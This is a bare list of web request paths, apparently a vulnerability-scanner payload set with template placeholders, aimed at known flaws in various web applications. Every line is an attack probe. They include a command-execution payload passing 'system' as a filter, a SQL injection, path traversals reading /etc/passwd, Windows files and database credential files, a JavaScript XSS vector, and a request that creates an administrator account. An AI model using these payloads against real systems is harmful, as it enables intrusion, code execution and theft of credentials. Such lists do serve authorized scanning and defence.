
/s=set&_method=__construct&method=*&filter[]=system
/tool/log/c.php?strip_slashes=printf&host=nl+c.php
/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20md5({{num}})),0x7e),1)--%20
/login.do?message={{num1}}*{{num2}}
/login/login.do?message={{num1}}*{{num2}}
/portal/attachment_clearTempFile.action?bean.RecId=1
/portal/attachment_getAttList.action?bean.RecId=1
/include/thumb.php?dir=http\..\admin\login\login_check.php
/install/
/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php
/jshERP-boot/user/getAllList;.ico
/common/download/resource?resource=/profile/../../../../etc/passwd
/common/download/resource?resource=/profile/../../../../Windows/win.ini
/authenticationserverservlet
/get_dkey.php?user=admin
/e/ViewImg/index.html?url=javascript:alert(1)
/web/xml/webuser-auth.xml
/api/dp/rptsvcsyncpoint?ccid=1
/view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename={{filename}}.txt
/webui/?g=sys_dia_data_down&file_name=../etc/passwd
/api/v1/user/save?ID=&Username={{user}}&Role=管理员&Enable=true
/Content/Plugins/uploader/FileChoose.html
/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA=
/WEB_VMS/LEVEL15/
/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties
/api/v1/GetSrc
/api/v1/GetDevice
